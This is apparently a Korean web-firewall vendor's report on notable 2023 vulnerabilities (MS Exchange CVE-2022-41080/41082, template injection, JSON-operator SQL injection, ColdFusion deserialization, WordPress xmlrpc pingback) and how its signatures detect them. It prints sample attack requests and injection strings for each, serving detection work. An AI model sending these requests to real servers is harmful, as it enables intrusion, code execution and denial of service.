2023년에 주목했던 주요 취약점과 시그니쳐 패턴 대응
1. 개요
모니터랩의 웹 방화벽은 다양한 보안 기술을 융합해서 웹 애플리케이션에 대한 공격을 예방하고 차단합니다. 이 기술들은 주요 취약점을 식별하고 이에 대한 효과적인 대응을 제공하여 웹 애플리케이션의 무결성과 가용성을 유지합니다. 웹 애플리케이션의 보안을 강화하기 위해서 정기적으로 업데이트되는 시그니쳐 패턴을 통해 다양한 웹 공격을 신속하게 감지하고 차단하는 핵심적인 구성 요소를 제공합니다. 이는 다양한 위협에 대해서 미리 정의된 시그니쳐 패턴을 사용하여 신속하게 대응함으로써 웹 애플리케이션의 안정성을 제고합니다.
보안 환경이 계속해서 진화하고 더욱 정효한 위협이 등장하기 때문에 능동적인 보안으로의 전환은 불가피한 상황이지만, 전통적인 시그니쳐 패턴은 여전히 중요한 보안 요소로 남아있습니다. 높은 신뢰성과 강력한 감지 능력을 제공하여, 현 시점에도 보안 전략의 필수적인 구성 요소로서의 역할을 수행합니다.
보안 환경에서 알려진 위협과 알려지지 않은 위협에 대응하기 위해서 지능적이고 혁신적인 인공지능 빅데이터 등과 전통적인 안정성을 제공하는 시그니쳐 패턴을 조화롭게 활용하는 것이 중요합니다. 두 가지 보안 요소가 서로 보완하며, 전체적인 보안 강화에 기여합니다.
2023년, 위협분석팀에서 전 세계적으로 발생한 다양한 사이버 위협 중에서 특히 주목받은 취약점들을 조사하고 분석했습니다. 이를 통해 신속하고 효과적인 대응을 위한 결과를 도출하였습니다. 아래는 올해 주목했던 주요 취약점입니다.
2. 2023년 주요 취약점
2-1) MS Exchange Server
낮은 권한의 사용자가 다양한 방법으로 MS Exchange Server 내 PowerShell에 접근해서 WebShell을 업로드 및 실행하는 취약점
- CVE-2022-41080: SSRF 취약점 공격
- Front-End(HTTP Proxy)에서 공격자의 페이로드를 해석하는 과정에서 취약점이 발생
- CVE-2022-41082: RCE 취약점 공격
- Back-End(Remote PowerShell)에서 공격자의 페이로드를 역직렬화하는 과정에서 취약점이 발생
- 샘플 공격 구문 및 탐지
POST /autodiscover/admin@localhost/powershell/autodiscover.json?x=a HTTP/1.1
Authorization: Basic cG9jdXNlcjpwb2NwYXNzd29yZA==
Content-Length: 1821
Content-Type: application/soap+xml;charset=utf-8
Host: www.sample.com
User-Agent: HTTPie
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
<s:Header>
<a:To>https://exchange16.domaincorp.com:443/PowerShell?PSVersion=5.1.19041.610</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">512000</w:MaxEnvelopeSize>
<a:MessageID>uuid:{MessageID}</a:MessageID>
<w:Locale xml:lang="en-US" s:mustUnderstand="false" />
<p:DataLocale xml:lang="en-US" s:mustUnderstand="false" />
<p:SessionId s:mustUnderstand="false">uuid:ddedca29-086e-4053-a983-0e00fa367968</p:SessionId>
<p:OperationID s:mustUnderstand="false">uuid:4bbdc4fa-7040-4697-93f3-179f7108c8e8</p:OperationID>
<p:SequenceId s:mustUnderstand="false">1</p:SequenceId>
<w:OptionSet xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" s:mustUnderstand="true">
<w:Option Name="protocolversion" MustComply="true">2.3</w:Option>
</w:OptionSet>
<w:OperationTimeout>PT180.000S</w:OperationTimeout>
</s:Header>
<s:Body>
<rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" Name="WinRM10" >
<rsp:InputStreams>stdin pr</rsp:InputStreams>
<rsp:OutputStreams>stdout</rsp:OutputStreams>
<creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAAAAASASDASDASASDSFASFASFDFADSKLJlkjlkjKLJSL...</creationXml>
</rsp:Shell>
</s:Body>
</s:Envelope>
2-2) Server Side Template Injection
웹 애플리케이션에 적용되는 웹 템플릿 엔진에 악성 템플릿 구문이 삽입되어 실행되는 취약점
- Template Engine 확인 방법
- 각 Engine에 맞는 문법을 이용하여 Injection 공격 시도
- 샘플 공격 구문 및 탐지
POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Query/Payload Length >= 10
Example
id=${{ "7"*7 }}&password=example
2-3) JSON Operator SQL Injection
다양한 DBMS에 추가된 JSON 데이터 관련 연산자 또는 함수를 활용한 SQL Injection 취약점
- DBMS별 JSON 지원 여부
- 각 DBMS별로 사용되는 함수 및 연산자가 다르기 때문에 해당 사항에 맞춰 공격 시도
- 샘플 공격 구문 및 탐지
POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Query/Payload Length >= 10
Example
/test?temp=test' or json_array_length({}) <= 3
2-4) Adobe Coldfusion
Adobe ColdFusion 제품에서 발생한 안전하지 않은 역직렬화 취약점으로 인해 발생한 RCE 취약점
- 취약점 공격
- 알려진 위치에 악성 Java 클래스 파일을 심고 CFC 엔드포인트를 요청하여 해당 파일의 실행을 크리거하는 것으로 공격
- 샘플 공격 구문 및 탐지
POST /testing.cfc?method=foo&_cfclient=true HTTP/1.1
Accept: */*
Connection: close
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Host: 10.0.0.225:8080
User-Agent: HTTPie
_variables={"_metadata":{"classname":"\..\runtime\work\Catalina\localhost\tmp\hax.tmp"}, "_variables":{}"}
2-5) Wordpress xmlrpc.php
Wordpress의 xmlrpc.php를 통해 발생하는 pingback 및 brute-force 취약점
- pingback: 포트를 확인한 후 pingback 기능을 이용한 DoS 공격
- brute-force: 무차별 대입 공격
- 샘플 공격 구문 및 탐지
POST /xmlrpc.php HTTP/1.1
Content-Length: 258
Content-Type: application/xml; charset=utf-8
Host: xxx.com
User-Agent: HTTPie
<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://victim.com</string></value></param><param><value><string>http://xxx/sample-page/</string></value></param></params></methodCall>
3. 참고
- https://nsfocusglobal.com/exchange-server-owassrf-vulnerability-cve-2022-41080-cve-2022-41082-alert/
- https://github.com/ohnonoyesyes/CVE-2022-41080
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082
- https://www.exploit-db.com/exploits/46386
- https://www.opencve.io/cve/CVE-2019-8341
- https://www.bleepingcomputer.com/news/security/hackers-breach-us-govt-agencies-using-adobe-coldfusion-xploit/
- https://www.cisa.gov/news-events/alerts/2023/12/05/cisa-releases-advisory-threat-actors-exploiting-cve-2023-26360-vulnerability-adobe-coldfusion
- https://www.picussecurity.com/resource/blog/cve-2023-26360-adobe-coldfusion-servers-exploited-for-initial-access
- https://www.exploit-db.com/exploits/43829
- https://github.com/nth347/CVE-2020-28032_PoC